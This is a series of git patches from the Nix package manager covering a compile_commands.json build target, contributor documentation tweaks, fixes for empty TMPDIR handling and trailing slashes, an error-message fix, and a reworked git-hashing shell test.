@@ -1,11 +1,41 @@
+
+# These are the complete command lines we use to compile C and C++ files.
+# - $< is the source file.
+# - $1 is the object file to create.
+CC_CMD=$(CC) -o $1 -c $< $(CPPFLAGS) $(GLOBAL_CFLAGS) $(CFLAGS) $($1_CFLAGS) -MMD -MF $(call filename-to-dep,$1) -MP
+CXX_CMD=$(CXX) -o $1 -c $< $(CPPFLAGS) $(GLOBAL_CXXFLAGS_PCH) $(GLOBAL_CXXFLAGS) $(CXXFLAGS) $($1_CXXFLAGS) $(ERROR_SWITCH_ENUM) -MMD -MF $(call filename-to-dep,$1) -MP
+
+# We use COMPILE_COMMANDS_JSON_CMD to turn a compilation command (like CC_CMD
+# or CXX_CMD above) into a compile_commands.json file. We rely on bash native
+# word splitting to define the positional arguments.
+# - $< is the source file being compiled.
+COMPILE_COMMANDS_JSON_CMD=jq --null-input '{ directory: $$ENV.PWD, file: "$<", arguments: $$ARGS.positional }' --args --
+
+
 $(buildprefix)%.o: %.cc
 	@mkdir -p "$(dir $@)"
-	$(trace-cxx) $(CXX) -o $@ -c $< $(CPPFLAGS) $(GLOBAL_CXXFLAGS_PCH) $(GLOBAL_CXXFLAGS) $(CXXFLAGS) $($@_CXXFLAGS) $(ERROR_SWITCH_ENUM) -MMD -MF $(call filename-to-dep, $@) -MP
+	$(trace-cxx) $(call CXX_CMD,$@)
 
 $(buildprefix)%.o: %.cpp
 	@mkdir -p "$(dir $@)"
-	$(trace-cxx) $(CXX) -o $@ -c $< $(CPPFLAGS) $(GLOBAL_CXXFLAGS_PCH) $(GLOBAL_CXXFLAGS) $(CXXFLAGS) $($@_CXXFLAGS) $(ERROR_SWITCH_ENUM) -MMD -MF $(call filename-to-dep, $@) -MP
+	$(trace-cxx) $(call CXX_CMD,$@)
 
 $(buildprefix)%.o: %.c
 	@mkdir -p "$(dir $@)"
-	$(trace-cc) $(CC) -o $@ -c $< $(CPPFLAGS) $(GLOBAL_CFLAGS) $(CFLAGS) $($@_CFLAGS) -MMD -MF $(call filename-to-dep, $@) -MP
+	$(trace-cc) $(call CC_CMD,$@)
+
+# In the following we need to replace the .compile_commands.json extension in $@ with .o
+# to make the object file. This is needed because CC_CMD and CXX_CMD do further expansions
+# based on the object file name (i.e. *_CXXFLAGS and filename-to-dep).
+
+$(buildprefix)%.compile_commands.json: %.cc
+	@mkdir -p "$(dir $@)"
+	$(trace-jq) $(COMPILE_COMMANDS_JSON_CMD) $(call CXX_CMD,$(@:.compile_commands.json=.o)) > $@
+
+$(buildprefix)%.compile_commands.json: %.cpp
+	@mkdir -p "$(dir $@)"
+	$(trace-jq) $(COMPILE_COMMANDS_JSON_CMD) $(call CXX_CMD,$(@:.compile_commands.json=.o)) > $@
+
+$(buildprefix)%.compile_commands.json: %.c
+	@mkdir -p "$(dir $@)"
+	$(trace-jq) $(COMPILE_COMMANDS_JSON_CMD) $(call CC_CMD,$(@:.compile_commands.json=.o)) > $@
diff --git a/mk/tracing.mk b/mk/tracing.mk
index 1fc5573d7..09db1e617 100644
--- a/mk/tracing.mk
+++ b/mk/tracing.mk
@@ -10,6 +10,8 @@ ifeq ($(V), 0)
   trace-install = @echo "  INST  " $@;
   trace-mkdir   = @echo "  MKDIR " $@;
   trace-test    = @echo "  TEST  " $@;
+  trace-sh      = @echo "  SH    " $@;
+  trace-jq      = @echo "  JQ    " $@;
 
   suppress  = @
 

From d0824f661e712c384332953db54bb523834909ce Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Thu, 21 Mar 2024 16:54:28 +0100
Subject: [PATCH 643/654] Document the new `compile_commands.json` target

---
 doc/manual/src/contributing/hacking.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md
index 916ec3077..28ed49666 100644
--- a/doc/manual/src/contributing/hacking.md
+++ b/doc/manual/src/contributing/hacking.md
@@ -258,7 +258,7 @@ See [supported compilation environments](#compilation-environments) and instruct
 To use the LSP with your editor, you first need to [set up `clangd`](https://clangd.llvm.org/installation#project-setup) by running:
 
 ```console
-make clean && bear -- make -j$NIX_BUILD_CORES default check install
+make compile_commands.json
 ```
 
 Configure your editor to use the `clangd` from the shell, either by running it inside the development shell, or by using [nix-direnv](https://github.com/nix-community/nix-direnv) and [the appropriate editor plugin](https://github.com/direnv/direnv/wiki#editor-integration).

From 4e2f11b6927cb0e4171b2758196f2310760617d2 Mon Sep 17 00:00:00 2001
From: Tharun T 
Date: Fri, 22 Mar 2024 18:34:55 +0530
Subject: [PATCH 644/654] doc build output correction

Signed-off-by: Tharun T 
---
 doc/manual/src/contributing/documentation.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/manual/src/contributing/documentation.md b/doc/manual/src/contributing/documentation.md
index 1dddb207c..46cca759d 100644
--- a/doc/manual/src/contributing/documentation.md
+++ b/doc/manual/src/contributing/documentation.md
@@ -30,7 +30,7 @@ To build the manual incrementally, [enter the development shell](./hacking.md) a
 make manual-html -j $NIX_BUILD_CORES
 ```
 
-and open `./outputs/out/share/doc/nix/manual/language/index.html`.
+and open `./outputs/doc/share/doc/nix/manual/language/index.html`.
 
 In order to reflect changes to the [Makefile for the manual], clear all generated files before re-building:
 

From bfd36402acc976c32ec8349a2a25fa4288d65475 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Fri, 22 Mar 2024 18:11:24 +0100
Subject: [PATCH 645/654] EvalCache: Fix missing format string argument

Fixes

  terminate called after throwing an instance of 'boost::wrapexcept'
    what():  boost::too_few_args: format-string referred to more arguments than were passed
  Aborted (core dumped)

for type errors in AttrCursor.
---
 src/libexpr/eval-cache.cc | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/libexpr/eval-cache.cc b/src/libexpr/eval-cache.cc
index 2fc69e796..1538eb056 100644
--- a/src/libexpr/eval-cache.cc
+++ b/src/libexpr/eval-cache.cc
@@ -581,7 +581,7 @@ std::string AttrCursor::getString()
     auto & v = forceValue();
 
     if (v.type() != nString && v.type() != nPath)
-        root->state.error("'%s' is not a string but %s", getAttrPathStr()).debugThrow();
+        root->state.error("'%s' is not a string but %s", getAttrPathStr(), showType(v)).debugThrow();
 
     return v.type() == nString ? v.c_str() : v.path().to_string();
 }
@@ -630,7 +630,7 @@ string_t AttrCursor::getStringWithContext()
     else if (v.type() == nPath)
         return {v.path().to_string(), {}};
     else
-        root->state.error("'%s' is not a string but %s", getAttrPathStr()).debugThrow();
+        root->state.error("'%s' is not a string but %s", getAttrPathStr(), showType(v)).debugThrow();
 }
 
 bool AttrCursor::getBool()

From cc29d85d06dbb050ac7df0f532ec0bec6212232b Mon Sep 17 00:00:00 2001
From: Picnoir 
Date: Fri, 22 Mar 2024 22:31:41 +0100
Subject: [PATCH 646/654] Doc: explicitly specify which shell to use to get
 clangd

I was using by mistake the .#nix-clangStdenv shell to retrieve clangd.
This clangd is unusable with the project and constantly segfaults.
Let's explicitly state which shell the user should use in the docs.

I don't really understand the source of this segfault. I assume it's
related to a clang version incompatibility. (16.0.6 for
.#nix-clangStdenv vs. 14.0.6 for .#native-clangStdenvPackages)
---
 doc/manual/src/contributing/hacking.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md
index 28ed49666..2ff70f500 100644
--- a/doc/manual/src/contributing/hacking.md
+++ b/doc/manual/src/contributing/hacking.md
@@ -261,7 +261,7 @@ To use the LSP with your editor, you first need to [set up `clangd`](https://cla
 make compile_commands.json
 ```
 
-Configure your editor to use the `clangd` from the shell, either by running it inside the development shell, or by using [nix-direnv](https://github.com/nix-community/nix-direnv) and [the appropriate editor plugin](https://github.com/direnv/direnv/wiki#editor-integration).
+Configure your editor to use the `clangd` from the `.#native-clangStdenvPackages` shell. You can do that either by running it inside the development shell, or by using [nix-direnv](https://github.com/nix-community/nix-direnv) and [the appropriate editor plugin](https://github.com/direnv/direnv/wiki#editor-integration).
 
 > **Note**
 >

From c3fb2aa1f9d1fa756dac38d3588c836c5a5395dc Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Fri, 22 Mar 2024 22:41:50 +0100
Subject: [PATCH 647/654] fix: Treat empty TMPDIR as unset

Fixes an instance of

    nix: src/libutil/util.cc:139: nix::Path nix::canonPath(PathView, bool): Assertion `path != ""' failed.

... which I've been getting in one of my shells for some reason.
I have yet to find out why TMPDIR was empty, but it's no reason for
Nix to break.
---
 src/libstore/globals.cc    | 2 +-
 src/libutil/file-system.cc | 8 ++++++--
 src/libutil/file-system.hh | 4 ++++
 src/nix-build/nix-build.cc | 2 +-
 4 files changed, 12 insertions(+), 4 deletions(-)

diff --git a/src/libstore/globals.cc b/src/libstore/globals.cc
index d22ae4ca0..fa0938d7b 100644
--- a/src/libstore/globals.cc
+++ b/src/libstore/globals.cc
@@ -415,7 +415,7 @@ void initLibStore() {
        sshd). This breaks build users because they don't have access
        to the TMPDIR, in particular in ‘nix-store --serve’. */
 #if __APPLE__
-    if (hasPrefix(getEnv("TMPDIR").value_or("/tmp"), "/var/folders/"))
+    if (hasPrefix(defaultTempDir(), "/var/folders/"))
         unsetenv("TMPDIR");
 #endif
 
diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc
index 9dd6a5133..9f81ee452 100644
--- a/src/libutil/file-system.cc
+++ b/src/libutil/file-system.cc
@@ -494,10 +494,14 @@ void AutoDelete::reset(const Path & p, bool recursive) {
 
 //////////////////////////////////////////////////////////////////////
 
+std::string defaultTempDir() {
+    return getEnvNonEmpty("TMPDIR").value_or("/tmp");
+}
+
 static Path tempName(Path tmpRoot, const Path & prefix, bool includePid,
     std::atomic & counter)
 {
-    tmpRoot = canonPath(tmpRoot.empty() ? getEnv("TMPDIR").value_or("/tmp") : tmpRoot, true);
+    tmpRoot = canonPath(tmpRoot.empty() ? defaultTempDir() : tmpRoot, true);
     if (includePid)
         return fmt("%1%/%2%-%3%-%4%", tmpRoot, prefix, getpid(), counter++);
     else
@@ -537,7 +541,7 @@ Path createTempDir(const Path & tmpRoot, const Path & prefix,
 
 std::pair createTempFile(const Path & prefix)
 {
-    Path tmpl(getEnv("TMPDIR").value_or("/tmp") + "/" + prefix + ".XXXXXX");
+    Path tmpl(defaultTempDir() + "/" + prefix + ".XXXXXX");
     // Strictly speaking, this is UB, but who cares...
     // FIXME: use O_TMPFILE.
     AutoCloseFD fd(mkstemp((char *) tmpl.c_str()));
diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh
index 963265e34..9d565c881 100644
--- a/src/libutil/file-system.hh
+++ b/src/libutil/file-system.hh
@@ -234,6 +234,10 @@ Path createTempDir(const Path & tmpRoot = "", const Path & prefix = "nix",
  */
 std::pair createTempFile(const Path & prefix = "nix");
 
+/**
+ * Return `TMPDIR`, or the default temporary directory if unset or empty.
+ */
+Path defaultTempDir();
 
 /**
  * Used in various places.
diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc
index a372e4b1c..418ee0ddd 100644
--- a/src/nix-build/nix-build.cc
+++ b/src/nix-build/nix-build.cc
@@ -476,7 +476,7 @@ static void main_nix_build(int argc, char * * argv)
         auto env = getEnv();
 
         auto tmp = getEnv("TMPDIR");
-        if (!tmp) tmp = getEnv("XDG_RUNTIME_DIR").value_or("/tmp");
+        if (!tmp || tmp->empty()) tmp = getEnv("XDG_RUNTIME_DIR").value_or("/tmp");
 
         if (pure) {
             decltype(env) newEnv;

From b9e7f5aa2df3f0e223f5c44b8089cbf9b81be691 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Sun, 24 Mar 2024 00:34:21 +0100
Subject: [PATCH 648/654] fix: Treat empty XDG_RUNTIME_DIR as unset

See preceding commit. Not observed in the wild, but is sensible
and consistent with TMPDIR behavior.
---
 src/nix-build/nix-build.cc | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc
index 418ee0ddd..35eef5b83 100644
--- a/src/nix-build/nix-build.cc
+++ b/src/nix-build/nix-build.cc
@@ -475,8 +475,9 @@ static void main_nix_build(int argc, char * * argv)
         // Set the environment.
         auto env = getEnv();
 
-        auto tmp = getEnv("TMPDIR");
-        if (!tmp || tmp->empty()) tmp = getEnv("XDG_RUNTIME_DIR").value_or("/tmp");
+        auto tmp = getEnvNonEmpty("TMPDIR");
+        if (!tmp)
+            tmp = getEnvNonEmpty("XDG_RUNTIME_DIR").value_or("/tmp");
 
         if (pure) {
             decltype(env) newEnv;

From fd31945742710984de22805ee8d97fbd83c3f8eb Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Sun, 24 Mar 2024 00:45:15 +0100
Subject: [PATCH 649/654] local-derivation-goal.cc: Reuse defaultTempDir()

---
 src/libstore/build/local-derivation-goal.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index a9b6a8dbf..f65afdf07 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -2090,7 +2090,7 @@ void LocalDerivationGoal::runChild()
 
             /* The tmpDir in scope points at the temporary build directory for our derivation. Some packages try different mechanisms
                to find temporary directories, so we want to open up a broader place for them to dump their files, if needed. */
-            Path globalTmpDir = canonPath(getEnvNonEmpty("TMPDIR").value_or("/tmp"), true);
+            Path globalTmpDir = canonPath(defaultTempDir(), true);
 
             /* They don't like trailing slashes on subpath directives */
             if (globalTmpDir.back() == '/') globalTmpDir.pop_back();

From dd26f413791b7885558afcc628623648b7fa6396 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Sun, 24 Mar 2024 00:45:57 +0100
Subject: [PATCH 650/654] local-derivation-goal.cc: Remove *all* trailing
 slashes

---
 src/libstore/build/local-derivation-goal.cc | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index f65afdf07..612434e4d 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -2093,7 +2093,8 @@ void LocalDerivationGoal::runChild()
             Path globalTmpDir = canonPath(defaultTempDir(), true);
 
             /* They don't like trailing slashes on subpath directives */
-            if (globalTmpDir.back() == '/') globalTmpDir.pop_back();
+            while (!globalTmpDir.empty() && globalTmpDir.back() == '/')
+                globalTmpDir.pop_back();
 
             if (getEnv("_NIX_TEST_NO_SANDBOX") != "1") {
                 builder = "/usr/bin/sandbox-exec";

From 850c9a6cafb74a82b8111dd6aeb4c0d434aba414 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Sun, 24 Mar 2024 00:46:15 +0100
Subject: [PATCH 651/654] HttpBinaryCacheStore: Remove *all* trailing slashes

---
 src/libstore/http-binary-cache-store.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libstore/http-binary-cache-store.cc b/src/libstore/http-binary-cache-store.cc
index 85c5eed4c..5da87e935 100644
--- a/src/libstore/http-binary-cache-store.cc
+++ b/src/libstore/http-binary-cache-store.cc
@@ -49,7 +49,7 @@ public:
         , BinaryCacheStore(params)
         , cacheUri(scheme + "://" + _cacheUri)
     {
-        if (cacheUri.back() == '/')
+        while (!cacheUri.empty() && cacheUri.back() == '/')
             cacheUri.pop_back();
 
         diskCache = getNarInfoDiskCache();

From 3b7f2bf99751bb51a9e9c4dab0fe2db1a6ff07ca Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Sun, 24 Mar 2024 00:54:44 +0100
Subject: [PATCH 652/654] git/dumpTree: Assert name not empty before back()

---
 src/libutil/git.cc | 1 +
 1 file changed, 1 insertion(+)

diff --git a/src/libutil/git.cc b/src/libutil/git.cc
index 0b6e35222..a60589baa 100644
--- a/src/libutil/git.cc
+++ b/src/libutil/git.cc
@@ -251,6 +251,7 @@ void dumpTree(const Tree & entries, Sink & sink,
     for (auto & [name, entry] : entries) {
         auto name2 = name;
         if (entry.mode == Mode::Directory) {
+            assert(!name2.empty());
             assert(name2.back() == '/');
             name2.pop_back();
         }

From fbf493758c0134a9b4c73b7dd38fc4c1d480b76c Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Sun, 24 Mar 2024 02:08:28 +0100
Subject: [PATCH 653/654] doc/language: Link to nix.dev introduction

Closes #10283
---
 doc/manual/src/language/index.md | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/doc/manual/src/language/index.md b/doc/manual/src/language/index.md
index 5388c6dc4..650412f1b 100644
--- a/doc/manual/src/language/index.md
+++ b/doc/manual/src/language/index.md
@@ -1,7 +1,13 @@
 # Nix Language
 
 The Nix language is designed for conveniently creating and composing *derivations* – precise descriptions of how contents of existing files are used to derive new files.
-It is:
+
+> **Tip**
+>
+> These pages are written as a reference.
+> If you are learning Nix, nix.dev has a good [introduction to the Nix language](https://nix.dev/tutorials/nix-language).
+
+The language is:
 
 - *domain-specific*
 

From 2a44b11f55939a97e3712a4525e60c4d4b12ea13 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Sat, 23 Mar 2024 22:01:30 -0400
Subject: [PATCH 654/654] Fix `git-hashing/simple.sh`

I realized it was previously checking the NAR hashes of added objects, which
makes little sense --- we don't really care about ancillary NAR hashes.

Now, the bottom `nix store add` tests compare the git hash in the CA field
against hashes calculated by Git itself. This matches the top `nix hash path`
tests in using git as the source of truth.
---
 tests/functional/git-hashing/simple.sh | 74 +++++++++++++++-----------
 1 file changed, 42 insertions(+), 32 deletions(-)

diff --git a/tests/functional/git-hashing/simple.sh b/tests/functional/git-hashing/simple.sh
index 604e1a175..f43168eb2 100644
--- a/tests/functional/git-hashing/simple.sh
+++ b/tests/functional/git-hashing/simple.sh
@@ -6,8 +6,9 @@ git init "$repo"
 git -C "$repo" config user.email "you@example.com"
 git -C "$repo" config user.name "Your Name"
 
+# Compare Nix's and git's implementation of git hashing
 try () {
-    hash=$(nix hash path --mode git --format base16 --algo sha1 $TEST_ROOT/hash-path)
+    local hash=$(nix hash path --mode git --format base16 --algo sha1 $TEST_ROOT/hash-path)
     [[ "$hash" == "$1" ]]
 
     git -C "$repo" rm -rf hash-path || true
@@ -15,7 +16,7 @@ try () {
     git -C "$repo" add hash-path
     git -C "$repo" commit -m "x"
     git -C "$repo" status
-    hash2=$(git -C "$TEST_ROOT/scratch" rev-parse HEAD:hash-path)
+    local hash2=$(git -C "$TEST_ROOT/scratch" rev-parse HEAD:hash-path)
     [[ "$hash2" = "$1" ]]
 }
 
@@ -32,36 +33,45 @@ echo "Run Hello World" > $TEST_ROOT/hash-path/executable
 chmod +x $TEST_ROOT/hash-path/executable
 try "e5c0a11a556801a5c9dcf330ca9d7e2c572697f4"
 
-rm -rf $TEST_ROOT/dummy1
-echo Hello World! > $TEST_ROOT/dummy1
-path1=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy1)
-hash1=$(nix-store -q --hash $path1)
-test "$hash1" = "sha256:1brffhvj2c0z6x8qismd43m0iy8dsgfmy10bgg9w11szway2wp9v"
+# Check Nix added object has matching git hash
+try2 () {
+    local hashPath="$1"
+    local expected="$2"
 
-rm -rf $TEST_ROOT/dummy2
-mkdir -p $TEST_ROOT/dummy2
-echo Hello World! > $TEST_ROOT/dummy2/hello
-path2=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy2)
-hash2=$(nix-store -q --hash $path2)
-test "$hash2" = "sha256:1vhv7zxam7x277q0y0jcypm7hwhccbzss81vkdgf0ww5sm2am4y0"
+    local path=$(nix store add --mode git --hash-algo sha1 "$repo/$hashPath")
 
-rm -rf $TEST_ROOT/dummy3
-mkdir -p $TEST_ROOT/dummy3
-mkdir -p $TEST_ROOT/dummy3/dir
-touch $TEST_ROOT/dummy3/dir/file
-echo Hello World! > $TEST_ROOT/dummy3/dir/file
-touch $TEST_ROOT/dummy3/dir/executable
-chmod +x $TEST_ROOT/dummy3/dir/executable
-echo Run Hello World! > $TEST_ROOT/dummy3/dir/executable
-path3=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy3)
-hash3=$(nix-store -q --hash $path3)
-test "$hash3" = "sha256:08y3nm3mvn9qvskqnf13lfgax5lh73krxz4fcjd5cp202ggpw9nv"
+    git -C "$repo" add "$hashPath"
+    git -C "$repo" commit -m "x"
+    git -C "$repo" status
+    local hashFromGit=$(git -C "$repo" rev-parse "HEAD:$hashPath")
+    [[ "$hashFromGit" == "$2" ]]
 
-rm -rf $TEST_ROOT/dummy3
-mkdir -p $TEST_ROOT/dummy3
-mkdir -p $TEST_ROOT/dummy3/dir
-touch $TEST_ROOT/dummy3/dir/file
-ln -s './hello/world.txt' $TEST_ROOT/dummy3/dir/symlink
-path3=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy3)
-hash3=$(nix-store -q --hash $path3)
-test "$hash3" = "sha256:1dwazas8irzpar89s8k2bnp72imfw7kgg4aflhhsfnicg8h428f3"
+    local caFromNix=$(nix path-info --json "$path" | jq -r ".[] | .ca")
+    [[ "fixed:git:sha1:$(nix hash convert --to nix32 "sha1:$hashFromGit")" = "$caFromNix" ]]
+}
+
+rm -rf "$repo/dummy1"
+echo Hello World! > "$repo/dummy1"
+try2 dummy1 "980a0d5f19a64b4b30a87d4206aade58726b60e3"
+
+rm -rf "$repo/dummy2"
+mkdir -p "$repo/dummy2"
+echo Hello World! > "$repo/dummy2/hello"
+try2 dummy2 "8b8e43b937854f4083ea56777821abda2799e850"
+
+rm -rf "$repo/dummy3"
+mkdir -p "$repo/dummy3"
+mkdir -p "$repo/dummy3/dir"
+touch "$repo/dummy3/dir/file"
+echo Hello World! > "$repo/dummy3/dir/file"
+touch "$repo/dummy3/dir/executable"
+chmod +x "$repo/dummy3/dir/executable"
+echo Run Hello World! > "$repo/dummy3/dir/executable"
+try2 dummy3 "f227adfaf60d2778aabbf93df6dd061272d2dc85"
+
+rm -rf "$repo/dummy4"
+mkdir -p "$repo/dummy4"
+mkdir -p "$repo/dummy4/dir"
+touch "$repo/dummy4/dir/file"
+ln -s './hello/world.txt' "$repo/dummy4/dir/symlink"
+try2 dummy4 "06f3e789820fc488d602358f03e3a1cbf993bf33"